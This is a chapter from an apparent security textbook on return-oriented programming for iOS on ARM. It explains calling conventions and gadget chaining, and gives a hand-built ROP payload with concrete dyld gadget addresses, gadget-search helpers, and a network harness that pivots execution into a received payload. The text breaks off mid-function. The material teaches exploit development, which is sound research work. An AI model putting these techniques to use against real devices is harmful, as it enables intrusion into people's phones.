Chapter 8

Return-Oriented Programming

Starting from iOS version 2.0, data execution prevention (DEP) is enabled by default for all applications running on the device. Therefore, the only viable way to gain arbitrary code execution is return-oriented programming (ROP). Although this technique is not unique to ARM, some peculiar challenges related to this architecture are worth exploring. Moreover, unlike other platforms, where ROP is usually used as a pivot to disable the non-executable bit, on iOS the entire payload needs to be written using ROP because there is no way to disable DEP or code signing from userland.

Because using ROP means you rely on code already present in the address space of an application to write a payload, it is absolutely necessary to understand both the ARM architecture basics and the calling convention used on iOS.

This chapter explores the concepts needed to successfully write a ROP payload. We first describe how to manually chain together existing application bits to create a coherent payload. After that we dissect possible ways of automating the process to avoid the expensive and tedious task of searching for code bits and linking them. We also show and analyze some examples of ROP payloads used in real-life exploits, either to link multiple exploits, or to perform specific tasks such as having the phone vibrate or exfiltrate the SMS database.

Finally, we discuss what testing scenario best fits ROP development on the iPhone, taking into account sandbox restrictions and ASLR.

ARM Basics

ARM is a reduced instruction set computing (RISC) architecture, meaning it has very few instructions and many general-purpose registers. In total, 16 registers are identified as R0–R15. Typically, the last three registers have special values and special names. R13 is called SP (the stack pointer register), R14 is called LR (the link register), and R15 is called PC (the program counter). Unlike x86, all of these registers are completely general, meaning, for instance, that it is possible to move an arbitrary value into PC and change the program flow. Likewise, it is perfectly acceptable to read from PC to determine the currently executed instruction.

ARM has two different execution modes, ARM and Thumb. Starting from ARMv7, a third one called Thumb-2 was introduced. The main difference between ARM and Thumb mode is that Thumb instructions are 16 bits (except for call opcodes, which are still 32 bits), whereas in ARM mode all instructions are 32 bits. Thumb-2 instructions are a mix of 16 bits and 32 bits. This design ensures that Thumb code can perform all the operations that ARM code can (for instance, exception handling and access to coprocessors).

For the processor to know whether it is executing ARM or Thumb code, a simple convention is used. If the least significant bit of the address executed is equal to 1, the processor expects to execute Thumb code, otherwise it expects ARM code. More formally, the processor expects to execute Thumb code when the T bit in the CPSR is 1 and the J bit in the CPSR is 0.
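The least-significant-bit convention matters every time you place a gadget address on a crafted stack. The following Python sketch shows how a client-side script might compute the value to load into PC for an interworking branch (such as BX or a pop into PC). The helper names are hypothetical, and the example address is the Thumb gadget at 0x2fe15f80 used later in this chapter.

```python
def is_thumb_target(address: int) -> bool:
    """True when branching to `address` selects Thumb state (bit 0 set)."""
    return (address & 1) == 1


def branch_target(instruction_address: int, thumb: bool) -> int:
    """Value to load into PC to run the instruction at `instruction_address`."""
    aligned = instruction_address & ~1
    return (aligned | 1) if thumb else aligned


def instruction_address(target: int) -> int:
    """Address the processor actually fetches from (bit 0 cleared)."""
    return target & ~1


# A Thumb gadget located at 0x2fe15f80 is referenced as 0x2fe15f81.
print(hex(branch_target(0x2FE15F80, thumb=True)))
```

This is why the gadget addresses stored in the payloads in this chapter are odd even though the instructions themselves sit at even addresses.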

ARM and Thumb mode are mostly equivalent in terms of expressiveness, but their mnemonics differ. It is outside the scope of this chapter to analyze all the instructions available on an ARM processor, but we dissect some of them because they are frequently used in the course of this chapter.

iOS Calling Convention

The most important thing to understand when it comes to ROP is the calling convention of the targeted OS.

iOS uses the ARM standard calling convention. The first four arguments are passed using the general-purpose registers R0–R3, whereas any additional parameters are pushed onto the stack. The return value is stored in the R0 register.
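To make the convention concrete, here is a minimal Python sketch that splits a call's arguments between registers and the stack. It is a simplification that assumes every argument is a 32-bit integer or pointer (wider types follow additional rules not covered here), and place_arguments is a hypothetical helper rather than part of any toolchain.

```python
ARG_REGISTERS = ("r0", "r1", "r2", "r3")


def place_arguments(args):
    """Split 32-bit arguments into register values and stacked values.

    Returns (registers, stack); stack[0] is the word at the lowest address.
    """
    registers = dict(zip(ARG_REGISTERS, args))
    stack = list(args[len(ARG_REGISTERS):])
    return registers, stack


# write(sock, str, 4): three arguments, so nothing goes on the stack.
print(place_arguments([5, 0x2FE00100, 4]))
# A six-argument call spills the last two arguments to the stack.
print(place_arguments([1, 2, 3, 4, 5, 6]))
```

For a ROP payload this means that calling most library functions only requires gadgets that control R0–R3.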

In the ARM instruction set, you have several ways of calling a function and changing the execution flow. The simplest way of doing so, besides manually setting the PC to a value of choice, is through the B (branch) instruction. This instruction just changes the PC to the address specified as the first operand.

If you want to return to the instruction following the call, you need the BL (branch and link) instruction. In fact, it not only sets the PC to the address specified by the first operand, but it also stores the return address into the LR register.

If the address to jump to is stored inside a register, you can use the BX instruction. This instruction changes only the execution flow without storing the return address anywhere.

Much like BL, the BLX instruction executes the address stored in the register passed as the first operand and stores the return address into the LR register.

In general, it is very common for ARM-compiled functions to have an epilogue that ends with a BX LR to return to the calling function. Alternatively, a function might push the value of LR onto the stack and then, upon returning, pop it into the PC register.

System Calls Calling Convention

Another vital notion to have when developing ARM payloads is how system calls are invoked on ARM, specifically on iOS. Historically, system calls have been exploit writers' best friends for two reasons. First, they allow the exploit to perform useful and powerful operations without the need to construct abstracted data types usually needed for library calls. For example, consider the simple operation of reading data from a file. You can read from a file using fread() and doing something like this:

fread(mybuf, sizeof(mybuf) -1, 1, filestream);

where mybuf is a C buffer and filestream is a pointer to a FILE structure that looks like this:

typedef struct _sFILE {
        unsigned char *_p;      /* current position in (some) buffer */
        int     _r;             /* read space left for getc() */
        int     _w;             /* write space left for putc() */
        short   _flags;          /* flags, below; this FILE is free if 0 */
        short   _file;           /* fileno, if Unix descriptor, else -1 */
        struct  _sbuf _bf;     /* the buffer (at least 1 byte, if !NULL) */
        int     _lbfsize;       /* 0 or -_bf._size, for inline putc */

        /* operations */
        void    *_cookie;       /* cookie passed to io functions */
        int     (*_close)(void *);
        int     (*_read) (void *, char *, int);
        fpos_t  (*_seek) (void *, fpos_t, int);
        int     (*_write)(void *, const char *, int);

        /* separate buffer for long sequences of ungetc() */
        struct  _sbuf _ub;     /* ungetc buffer */
        struct _sFILEX *_extra; /* additions to FILE to not break ABI */
        int     _ur;            /* saved _r when _r is counting ungetc data */

        /* tricks to meet minimum requirements even when malloc() fails */
        unsigned char _ubuf[3]; /* guarantee an ungetc() buffer */
        unsigned char _nbuf[1]; /* guarantee a getc() buffer */

        /* separate buffer for fgetln() when line crosses buffer boundary */
        struct  _sbuf _lb;     /* buffer for fgetln() */

        /* Unix stdio files get aligned to block boundaries on fseek() */
        int     _blksize;       /* stat.st_blksize (may be != _bf._size) */
        fpos_t  _offset;        /* current lseek offset (see WARNING) */
} FILE;

An attacker would need to keep a structure like this in memory while writing her shellcode. This is often cumbersome and not really needed, because the only piece of information regarding a file that is needed is a file descriptor, an integer. So instead, attackers have historically preferred syscalls:

read(filedescriptor, mybuf, sizeof(mybuf) - 1);

where the only bit of information needed is the file descriptor (an integer).

The second reason system calls are so attractive to exploit writers is that you can call a syscall without having to worry about library load addresses and randomization. Additionally, they are available regardless of which libraries are loaded in the address space of the application. In fact, a syscall allows a user space application to call code residing in kernel space by using what are known as traps. Each available syscall has a number associated with it that is necessary for the kernel to know what function to call. For the iPhone, the syscall numbers are stored inside the SDK at the relative path: /usr/include/sys/syscall.h.

People familiar with x86 know that syscalls are usually invoked by storing a syscall number into EAX and then using the assembly instruction int 0x80, which triggers the trap 0x80, which is the trap responsible for dealing with syscalls invocation.

On ARM the calling convention is to store arguments the same way you would for normal calls. After that, the syscall number is stored in the R12 register and to invoke it, the assembly instruction SVC is used.
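The register state expected just before the SVC instruction can be sketched as follows. The numbers for read, write, and close are the ones listed in sys/syscall.h; syscall_registers is a hypothetical helper, and the sketch deliberately handles only system calls with up to four arguments.

```python
# Syscall numbers as listed in sys/syscall.h.
SYS_READ, SYS_WRITE, SYS_CLOSE = 3, 4, 6


def syscall_registers(number, *args):
    """Register values to set up before executing SVC.

    Arguments go in r0-r3 as for a normal call; the syscall number goes in r12.
    """
    if len(args) > 4:
        raise ValueError("this sketch only models up to four arguments")
    registers = {f"r{i}": value for i, value in enumerate(args)}
    registers["r12"] = number
    return registers


# write(5, buf, 4) expressed as a raw system call.
print(syscall_registers(SYS_WRITE, 5, 0x2FE00100, 4))
```

A ROP payload that wants to issue a raw system call therefore needs gadgets that control R12 in addition to the argument registers.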

When it comes to return-oriented programming, it is necessary to have the address of a library to find usable SVC instructions because, in general, only library functions use syscalls.

ROP Introduction

Although it is pretty common nowadays to talk about ROP as if it were something new, its story goes back to 1997, when a security researcher known as Solar Designer first published an exploit using a technique dubbed “return-into-libc.”

Things have changed wildly since 1997, and ROP today is much more complex, powerful, and useful than it used to be. Nonetheless, to fully understand what ROP is and how it works, return-into-libc is the perfect start.

The idea behind Solar Designer's technique was pretty simple, although revolutionary for the time. If all your shellcode does is spawn a shell and to do that you already have a library function available, why should you write extra code? It's all there already!

The only thing you need to do is understand how to pass parameters to a function and call it. At that time Solar Designer was dealing with a plain stack buffer overflow, which meant he could overwrite the entire stack content as he wished. Traditionally, attackers would have written the shellcode on the stack, and then set the return address to point back to the shellcode to gain code execution.

What Solar Designer did was to put data instead of executable code on the stack, so that instead of having to execute a payload he could just set the return address of the vulnerable function to the execve() library function.

Because on x86 Linux in 1997 the calling convention was to pass parameters on the stack, he pushed onto it the parameter he wanted to pass to execve(), and the exploit was done.

Figure 8.1 shows how a usual stack overflow exploit looked back in those days, next to the one written by Solar Designer using return-into-libc.

Figure 8.1 Comparison of stack layout between standard exploit and return-into-libc

ROP is based on the concept that instead of being able only to invoke a function using return-into-libc techniques, it is possible to create entire payloads, and programs, based on the code already available in a process address space.

To do that, the ability to maintain control over the stack while developing a payload is vital.

In fact, as long as an attacker can control the stack layout, it is possible for him to chain together multiple “return” instructions that will keep retrieving the instruction pointer from it, and thus execute a number of instructions at will. Imagine the stack shown in Figure 8.2.

Figure 8.2 Sample ROP stack layout

What will happen here is that after the first call, the first pop-pop-ret instruction sequence jumps to the second function address on the stack and so on. This process can go on for as long as it is needed to achieve the attacker's goal.
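The chaining mechanism can be illustrated with a toy simulation. The sketch below is not an emulator: it assumes every gadget has the form "pop some registers, then pop the next address into the program counter," and all addresses and values are made up for the example.

```python
def run_chain(stack, gadgets, max_steps=100):
    """Simulate gadgets of the form 'pop {regs..., pc}' over a crafted stack.

    `gadgets` maps an address to the registers that gadget pops before it
    pops the next program counter. Returns (registers, trace, final_pc).
    """
    registers, trace = {}, []
    sp = 0
    pc = stack[sp]          # the overwritten return address starts the chain
    sp += 1
    for _ in range(max_steps):
        if pc not in gadgets:
            break           # control left the set of known gadgets
        trace.append(pc)
        for reg in gadgets[pc]:
            registers[reg] = stack[sp]
            sp += 1
        pc = stack[sp]      # the gadget's final "return"
        sp += 1
    return registers, trace, pc


gadgets = {0x1000: ("r0", "r1"), 0x2000: ("r4",)}   # hypothetical gadgets
stack = [0x1000, 0xAAAA, 0xBBBB, 0x2000, 0xCCCC, 0xDEAD]
print(run_chain(stack, gadgets))
```

Each gadget consumes its own data words from the stack and then hands control to the next address, which is exactly why keeping control of the stack layout is enough to keep control of execution.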

ROP and Heap Bugs

If you are unfamiliar with ROP, you might be wondering whether this technique can be used only with stack-based bugs. This is not the case; it is almost always possible to force the stack pointer register to point to a heap location.

Depending on what you have under your control, a different technique has to be used. But all techniques generally boil down to either shifting the stack location until it reaches an address under the attacker's control or moving the content of a register into the stack pointer.

Manually Constructing a ROP Payload

One of the main obstacles to writing ROP payloads is the amount of time needed to find just the right instruction sequence to meet your needs. At a very simple level, because ARM instructions are either two or four bytes aligned, you can just use a simple disassembler and the grep utility for finding them. This can be enough when it comes to simple payloads, because you generally need only a handful of instruction sequences. In this section, you explore this process to get a better feeling of the mental steps that you have to follow to build such a payload.
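As an alternative to grepping disassembler output, a few lines of Python can locate the most useful kind of Thumb gadget, a pop that ends by loading PC. The sketch relies on the 16-bit Thumb encoding of pop with PC in the register list (high byte 0xbd, low byte a bit mask for r0–r7). The function names and the sample bytes and base address are assumptions made for illustration, and the scan is naive: it does not distinguish real instructions from data or from halves of 32-bit instructions.

```python
import struct


def decode_thumb_pop_pc(halfword):
    """Register list if `halfword` encodes Thumb 'pop {..., pc}', else None."""
    if (halfword & 0xFF00) != 0xBD00:
        return None
    registers = [f"r{i}" for i in range(8) if halfword & (1 << i)]
    return registers + ["pc"]


def find_pop_pc_gadgets(code: bytes, base: int):
    """Scan 2-byte-aligned halfwords; return (thumb_address, registers) pairs."""
    found = []
    for offset in range(0, len(code) - 1, 2):
        (halfword,) = struct.unpack_from("<H", code, offset)
        registers = decode_thumb_pop_pc(halfword)
        if registers is not None:
            found.append(((base + offset) | 1, registers))
    return found


# Sample bytes: mov r0, r6 / blx r2 / pop {r1, r3, r5, r6, r7, pc}
sample = bytes.fromhex("30469047eabd")
print(find_pop_pc_gadgets(sample, 0x2FE05BC4))
```

The returned addresses already have the Thumb bit set, so they can be stored in a payload as they are.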

On the iPhone, all the system libraries are stored together inside a huge “cache” called dyld_shared_cache. To start looking for instructions you need to find a way to extract a library from the shared cache. To do that, you use a tool called dyld_decache, which you can find at https://github.com/kennytm/Miscellaneous. Here you see how to export libSystem on Mac OS X with the decrypted file system mounted (relative path):

./dyld_decache -f libSystem System/Library/Caches/com.apple.dyld/dyld_shared_cache_armv7

The other important parts of the address space where an attacker can find suitable gadgets are the dynamic linker and the main binary of the application. The former, called dyld, is located at /usr/lib/dyld. The latter is typically inside the application bundle.

To write a ROP payload you start by performing a simple operation, such as writing a word to an already open socket using ROP. The following C code is what you are trying to emulate using ROP:

char str[] = "TEST";
write(sock, str, 4);
close(sock);

When you compile this code, you obtain the following ARM assembly code snippet:

_text:0000307C                 LDR.W           R0, [R7,#0x84+sock] ; int
_text:00003080                 LDR.W           R1, [R7,#0x84+testString] ; void *
_text:00003084                 LDR.W           R2, [R7,#0x84+var_EC] ; size_t
_text:00003088                 BLX             _write
_text:0000308C                 STR.W           R0, [R7,#0x84+var_F4]
_text:00003090                 LDR.W           R0, [R7,#0x84+sock] ; int
_text:00003094                 BLX             _close

As expected, the payload is pretty trivial; the compiler uses the stack to store the return value of write() and it reads all the necessary parameters from the stack.

Now that you have a general skeleton of the code, it might be useful to tweak a few things to make the process of translating from ARM Assembly to ROP as painless as possible. You assume the sock descriptor is in R6:

MOV R1, #0x54534554
STR R1, [SP, #0]
MOV R1, SP
MOV R2, #4
MOV R0, R6
BLX _write
MOV R0, R6
BLX _close

In this payload you made use of the stack as much as possible. In fact, because with ROP the stack is under an attacker's control, modeling the shellcode this way allows you to reduce the number of gadgets to find because you can directly control the stack content and thus avoid all the store operations on the stack. The other important difference is that you avoid, as much as possible, changing the content and layout of the stack by saving references you need, for example the socket, into unused general-purpose registers.
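The constant 0x54534554 in the listing above is simply the string "TEST" read as one little-endian 32-bit word. The following Python sketch shows how you might convert an arbitrary string into the words to place on a crafted stack; string_to_words is a hypothetical helper, and padding with NUL bytes is an assumption of the sketch.

```python
import struct


def string_to_words(data: bytes):
    """Pad `data` with NUL bytes to a multiple of 4 and return LE 32-bit words."""
    padded = data + b"\x00" * (-len(data) % 4)
    return list(struct.unpack(f"<{len(padded) // 4}I", padded))


print([hex(word) for word in string_to_words(b"TEST")])
print(struct.pack("<I", 0x54534554))
```

Because the stack content is under your control, placing these words directly in the payload replaces the MOV and STR instructions entirely.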

This example uses dyld, the dynamic linker, from iOS 5.0 to create the ROP payload. The choice of dyld is important for three reasons:

  • It is loaded in the address space of every application.
  • It contains a number of library functions.
  • Unless the main application binary is randomized (that is, compiled with MH_PIE flags), dyld is not randomized either.

To test the ROP payload, this simple application connects to the remote server and then stores the payload in a buffer:

int main(int argc, char *argv[])
{
       
    int sock;
    struct sockaddr_in echoServAddr;
    sock = socket(PF_INET, SOCK_STREAM, 0);
    memset(&echoServAddr, 0, sizeof(echoServAddr));
    echoServAddr.sin_family = AF_INET;
    echoServAddr.sin_addr.s_addr = inet_addr("192.168.0.3");
    echoServAddr.sin_port = htons(1444);
    connect(sock, (struct sockaddr *)&echoServAddr, sizeof(echoServAddr));
    DebugBreak();
    unsigned int *payload = malloc(300);
    int i = 0;

To run the shellcode you use a small assembly snippet that copies the sock variable into the R6 register to comply with the assumption made before. Afterward, you point the stack pointer to the payload variable that contains your crafted stack with the ROP gadgets. Finally, to start the execution you pop the program counter from the newly set stack pointer:

          __asm__ __volatile__ ("mov sp, %0\n\t"
                          "mov r6, %1\n\t"
                          "pop {pc}"
                          :
                          :"r"(payload), "r"(sock)
                          );

The goal of the first sequence of ROP gadgets is to store R6 into R0. To do this, the following instructions are executed:

    payload[i] = 0x2fe15f81; //2fe15f80  bd96  pop  {r1, r2, r4, r7, pc}
    i++;
    payload[i] = 0x0; //r1
    i++;
    payload[i] = 0x2fe05bc9; //r2 2fe05bc9  bdea pop  {r1, r3, r5, r6, r7, pc}
    i++;
    payload[i] = 0x0; //r4
    i++;
    payload[i] = 0x0; //r7
    i++;
    payload[i] = 0x2fe0cc91; //pc,        
    /* 4630    mov     r0, r6
       4790    blx     r2
      
       Blx will jump to 2fe05bc9
     */

Now you want to store R0 into R8 so that when you need to call write() it is easy to retrieve the sock descriptor:

    i++;
    payload[i] = 0x0; //r1
    i++;
    payload[i] = 0x2fe0cc31; //r3
    i++;
    payload[i] = 0x0; //r5
    i++;
    payload[i] = 0x0; //r6
    i++;
    payload[i] = 0x0; //r7
    i++;
    payload[i] = 0x2fe114e7; //pc
    /*
     2fe114e6            aa01        add     r2, sp, #4
     2fe114e8            4798        blx     r3
    
       r2 will point to current stack pointer + 4.
       blx will jump to 0x2fe0cc31.
     2fe0cc30            4680        mov     r8, r0
     2fe0cc32            4630        mov     r0, r6
     2fe0cc34        f8d220c0        ldr.w   r2, [r2, #192]
     2fe0cc38            4790        blx     r2

     */
    i++;
    payload[i + (4 + 192)/4] = 0x2fe05bc9;
    /* this is used by the previous gadget to obtain a valid address for r2 to
       jump to:
          2fe05bc8      bdea     pop   {r1, r3, r5, r6, r7, pc}

     */
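The index arithmetic used for that extra slot is worth spelling out. The gadget computes r2 = sp + 4 and then loads from r2 + 192, so the word it reads lies 196 bytes, or 49 words, past the slot the stack pointer references. The Python sketch below reproduces the calculation; slot_index is a hypothetical helper.

```python
WORD_SIZE = 4


def slot_index(sp_index, add_immediate, ldr_immediate):
    """Payload index read by 'add rX, sp, #a' followed by 'ldr rX, [rX, #b]'.

    `sp_index` is the payload index the stack pointer references when the
    add instruction executes.
    """
    byte_offset = add_immediate + ldr_immediate
    if byte_offset % WORD_SIZE:
        raise ValueError("offset is not word aligned")
    return sp_index + byte_offset // WORD_SIZE


# In the listing, i is 12 when the slot is written.
print(slot_index(12, 4, 192))
```

With i equal to 12 the write lands at payload[61], which still fits in the 300-byte (75-word) buffer allocated by the test application.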

The final step is to set R2 to 4, which is the size of the string you want to write. Point R1 to the stack location containing the string “TEST” and call write():

    payload[i] = 0x0; //r1 (no increment here: i already indexes the slot sp points to)
    i++;
    payload[i] = 0x2fe0b7d5; //r3 bdf0  pop  {r4, r5, r6, r7, pc}
    i++;
    payload[i] = 0x0; //r5
    i++;
    payload[i] = 0x0; //r6
    i++;
    payload[i] = 0x2fe00040; //r7: the value pointed by this + 12 is a 4,
                             //the size of the string we want to write
    i++;
    payload[i] = 0x2fe0f4c5; //pc
    /*
     2fe0f4c4            a903        add     r1, sp, #12
     2fe0f4c6            4640        mov     r0, r8
     2fe0f4c8            68fa        ldr     r2, [r7, #12]
     2fe0f4ca            4798        blx     r3
     r1 will point to the string, r0 to the sock variable and r2 to 4
     */
    i++;
    payload[i] = 0x2fe1d730; //r4, address of _write()
    i++;
    payload[i] = 0x0; //r5
    i++;
    payload[i] = 0x0; //r6
    i++;
    payload[i] = 0x54534554; //r7 points to "TEST" but for no good reasons.
                             //Only r1 needs to point here. This is just a side effect.
    i++;
    payload[i] = 0x2fe076d3;   //pc
    /*
     2fe076d2            47a0        blx     r4
     2fe076d4            b003        add     sp, #12
     2fe076d6            bd90        pop     {r4, r7, pc}

     */

The procedure for calling close() is pretty much identical, except that only R0 needs to be set to the sock descriptor (still stored in R8):

    i++;
    payload[i] = 0x0; //unused
    i++;
    payload[i] = 0x0; //unused
    i++;
    payload[i] = 0x0; //unused
    i++;
    payload[i] = 0x0; //r4
    i++;
    payload[i] = 0x0; //r7
    i++;
    payload[i] = 0x2fe05bc9; //pc bdea   pop   {r1, r3, r5, r6, r7, pc}
    i++;
    payload[i] = 0x0; //r1
    i++;
    payload[i] = 0x2fe1cf8d; //r3, bdb0   pop   {r4, r5, r7, pc}
    i++;
    payload[i] = 0x0; //r5
    i++;
    payload[i] = 0x0; //r6
    i++;
    payload[i] = 0x2fe076d6; //r7: arbitrary valid address to not crash when r2
                             //is read from r7 + #12
    i++;
    payload[i] = 0x2fe0f4c5; //pc
    /*
     2fe0f4c4            a903        add     r1, sp, #12
     2fe0f4c6            4640        mov     r0, r8
     2fe0f4c8            68fa        ldr     r2, [r7, #12]
     2fe0f4ca            4798        blx     r3
     */
    i++;
    payload[i] = 0x2fe1d55c; //r4, address of close()
    i++;
    payload[i] = 0x0; //r5
    i++;
    payload[i] = 0x0; //r7
    i++;
    payload[i] = 0x2fe076d3; //pc
    /*
     2fe076d2            47a0        blx     r4
     2fe076d4            b003        add     sp, #12
     2fe076d6            bd90        pop     {r4, r7, pc}
     */
    i++;
    payload[i] = 0x0; //unused
    i++;
    payload[i] = 0x0; //unused
    i++;
    payload[i] = 0x0; //unused
    i++;
    payload[i] = 0xcccccccc; //end of payload
    i++;
    payload[i] = 0xcccccccc; //end of payload
    i++;
    payload[i] = 0xcccccccc; //end of payload pc crashes here

In this example, you may have noticed that even a really simple set of operations, such as writing to a remote server and closing the connection to it, can be quite lengthy when ported to ROP. This is especially true when the number of usable instructions at the attacker's disposal is limited.

The next section discusses a number of strategies to automate the process of finding and chaining instruction sequences.

Automating ROP Payload Construction

It should be fairly clear by now that the process of finding suitable instructions by hand is cumbersome and could be time-consuming. During the past couple of years there have been many different proposed approaches to automating the process.

Kornau showed one of the most complete, albeit resource-intense, methodologies: http://static.googleusercontent.com/external_content/untrusted_dlcp/www.zynamics.com/en//downloads/kornau-tim--diplomarbeit--rop.pdf.

The idea behind this approach follows a number of steps. First, because any assembly instruction set tends to be really rich in terms of instructions, and each instruction can perform multiple operations at once, it is handy to have a way to reduce the number of instructions under consideration.

To this end, each binary is first translated into an intermediate language that has fewer instructions, where each one of these new instructions performs one and only one operation.

Once a binary is translated into this intermediate language, through some algorithms that are outside the scope of this chapter, it is possible to have a set of instructions chained together. Those instruction sequences are commonly referred to as gadgets. Each gadget has a specific use case; for instance, you could have the gadget move a register into another register or perform a syscall. Of course, the attacker cannot expect to find exactly what he needs in a binary. Therefore, a gadget might be carrying other operations besides the ones needed to achieve a specific task. These additional operations are called side effects.

At this stage, the attacker has all the gadgets he could possibly find in a given binary. This is not enough, though, because another time-consuming phase is joining together gadgets to create a meaningful payload.

As explained before, each gadget has side effects, and when writing a payload you have to take these side effects into account. For instance, a gadget that performs a syscall might also, as a side effect, clobber the contents of a register. If you needed that register content intact, you would have to find a different gadget that is semantically equivalent but with different side effects, or take the clobbering into account and use a gadget before the “perform syscall” gadget to save the contents of the register and restore it after the system call.
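The bookkeeping described above can be sketched in a few lines of Python. Here each gadget is annotated with the operation it performs and the registers it clobbers, and a selection function rejects any gadget that would destroy a register you still need. The Gadget record, the pick_gadget helper, and every address in the example are hypothetical.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Gadget:
    address: int
    operation: str          # what the gadget is used for
    clobbers: frozenset     # registers overwritten as a side effect


def pick_gadget(gadgets, operation, live_registers):
    """Return the gadget for `operation` that preserves `live_registers`.

    Among the safe candidates, prefer the one with the fewest side effects.
    Returns None when every candidate clobbers a live register.
    """
    live = set(live_registers)
    candidates = [g for g in gadgets
                  if g.operation == operation and not (g.clobbers & live)]
    if not candidates:
        return None
    return min(candidates, key=lambda g: len(g.clobbers))


catalog = [
    Gadget(0x1001, "syscall", frozenset({"r4", "r8"})),
    Gadget(0x2001, "syscall", frozenset({"r5"})),
    Gadget(0x3001, "mov r0, r6", frozenset()),
]
print(pick_gadget(catalog, "syscall", {"r8"}))
```

When pick_gadget returns None you are in the second situation the text describes: you have to save the live register with another gadget first and restore it afterward.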

To streamline this process, you can use a compiler. A ROP compiler is a piece of software that automatically chains gadgets together, taking into account side effects for each gadget that is used. One of the most common techniques to implement such a compiler is to use a Satisfiability Modulo Theories (SMT) solver that goes through each available gadget for an operation and verifies whether it satisfies the conditions imposed by the previous chain of gadgets.

Although this process of finding all the gadgets, annotating them with side effects, and using a compiler to create payloads, is the formally correct way of solving the payload creation problem, it can be time-consuming and not worth it depending on the attacker's needs. For these reasons, a simpler approach was proposed.

If the binary is large enough to include multiple gadgets for a given operation, you can handpick the ones that are mostly side-effect free, so that you don't need to worry about possible problems when chaining them together. Once you have done so, you can write a simple wrapper around those gadgets in your favorite programming language and use it to construct the payload.

Two great examples of this approach are comex's Saffron ROP payload for ARM and Dino Dai Zovi's BISC for x86. To give you a sense of how this idea works in practice, you can examine one of the Python functions found in Saffron to load R0 from an address:

def load_r0_from(address):
    gadget(R4=address, PC=('+ 20 68 90 bd', '- 00 00 94 e5 90 80 bd e8'),
           a='R4, R7, PC')

This function searches the available gadget sources for one of the two byte sequences. The first one, in Thumb mode, 20 68 90 bd, corresponds to the following instructions:

6820        ldr     r0, [r4, #0]
bd90        pop     {r4, r7, pc}

The second one in ARM mode corresponds to:

e5940000    ldr   r0, [r4]
e8bd8090    ldmia  sp!, {r4, r7, pc}
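The search itself is easy to approximate. The following Python sketch is not Saffron's code; it is a minimal stand-in that assumes the leading "+" marks a Thumb pattern and "-" an ARM pattern, as the description above suggests, and that the image is loaded at an aligned base address. find_pattern and the sample images are hypothetical.

```python
def find_pattern(image: bytes, base: int, pattern: str):
    """Find a byte pattern such as '+ 20 68 90 bd' in `image`.

    '+' patterns must be 2-byte aligned and get the Thumb bit set in the
    result; '-' patterns must be 4-byte aligned. Returns None if absent.
    """
    mode, hex_bytes = pattern[0], pattern[1:].strip()
    needle = bytes.fromhex(hex_bytes)
    alignment = 2 if mode == "+" else 4
    start = 0
    while True:
        offset = image.find(needle, start)
        if offset < 0:
            return None
        if offset % alignment == 0:
            address = base + offset
            return (address | 1) if mode == "+" else address
        start = offset + 1      # misaligned hit, keep searching


thumb_image = bytes.fromhex("00bf206890bd")
arm_image = bytes.fromhex("00000000000094e59080bde8")
print(hex(find_pattern(thumb_image, 0x1000, "+ 20 68 90 bd")))
print(hex(find_pattern(arm_image, 0x2000, "- 00 00 94 e5 90 80 bd e8")))
```

A wrapper built this way tries each pattern in turn and uses the first one that is present in the target binary.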

This approach obviously has some drawbacks. In fact, it is in general possible to perform the same operations with a huge number of different instruction sequences. Therefore, if you forget a valid binary pattern you might wrongly assume that a given operation is not possible given the gadgets available.

On the other hand, writing such a tool is much faster than the approach using an SMT solver, and in the cases where a huge library or set of libraries is available, it is pretty much all an attacker needs. In the iOS case, if you are able to leak the address of one of the libraries in the dyld_shared_cache, you have at your disposal the entire cache, which is roughly 200 MB in size and contains virtually all the gadgets you might need.

What Can You Do with ROP on iOS?

iOS employs code signing for all the applications present on the device. Code signing can be seen as an enhanced version of DEP-like countermeasures. In fact, on most OSs even when the protection is enabled, it is possible in one way or another to allocate memory pages that are writable, readable, and executable. This results in a defeat of the countermeasure, and for that reason, most of the ROP shellcodes are very simple snippets that aim at disabling the non-executable protection and then pivot to a standard shellcode.

Unfortunately, this is not possible on iOS because no known ways of disabling code signing from userland exist. The attacker is therefore left with three options.

The first one is to write the entire payload using ROP. Later in this chapter you see a real-life example of such a payload.

The second one is to use ROP to chain together two different exploits, a remote one and a local one for the kernel. By doing this the attacker can bypass the userland code signing and execute a normal payload in either kernel space or userland. A famous example of such a combination is shown at the end of the chapter.

Finally, if the exploit targets a recent version of MobileSafari, a ROP payload can write a standard payload to the memory pages reserved for JIT code. In fact, to speed up browser performance, most JavaScript engines employ just-in-time compilation, which requires pages to be readable, writable, and executable (see Chapter 4 for more information on this topic for iOS).

Testing ROP Payloads

It is clear by now that the process of writing and testing a ROP payload can be quite long and cumbersome. The problem is augmented by the fact that applications cannot be debugged on a factory (non-jailbroken) device. This means that the only way for an attacker to test with an exploit (for example, one for MobileSafari) on a factory phone is looking at the crash reports obtained through iTunes.

Debugging a ROP payload is by itself tricky, let alone when the only debugging capability you have is crash logs. To ease this problem and grant some degree of debugging capabilities, it is desirable to have a testing application that enables you to verify the proper functioning of your shellcode.

The following testing harness is pretty simple. You create a server that receives a payload and executes it. The core component is shown here:

void restoreStack()
{
    __asm__ __volatile__("mov sp, %0\t\n"
                         "mov pc, %1"
                         :
                         :"r"(stack_pointer), "r"(ip + 0x14)
                         );
    //WARNING: if any code is added to read_and_exec the 'ip + 0x14'
    //has to be recalculated
}

int read_and_exec(int s)
{   
    int n, length;
    unsigned int restoreStackAddr = (unsigned int)&restoreStack;

   
    fprintf(stderr, "Reading length... ");
    if ((n = recv(s, &length, sizeof(length), 0)) != sizeof(length)) {
        if (n < 0)
            perror("recv");
        else
            fprintf(stderr, "recv: short read\n");
        return -1;
    }
    fprintf(stderr, "%d\n", length);
    void *payload = malloc(length + 1);
    if (payload == NULL) {
        perror("Unable to allocate the buffer");
        return -1;
    }

    fprintf(stderr, "Sending address of restoreStack function\n");
   
    if(send(s, &restoreStackAddr, sizeof(unsigned int), 0) == -1)
        perror("Unable to send the restoreStack function address");
   
    fprintf(stderr, "Reading payload... ");
    if ((n = recv(s, payload, length, 0)) != length) {
        if (n < 0)
            perror("recv");
        else
            fprintf(stderr, "recv: short read\n");
        free(payload);
        return -1;
    }
       
    __asm__ __volatile__ ("mov %1, pc\n\t"
                          "mov %0, sp\n\t"
                          :"=r"(stack_pointer), "=r"(ip)
                  );
    __asm__ __volatile__ ("mov sp, %0\n\t"
                          "pop {r0, r1, r2, r3, r4, r5, r6, pc}"
                          :
                          :"r"(payload)
                          );
   
        //the payload jumps back here
    stack_pointer = ip = 0;
    free(payload);
   
    return 0;
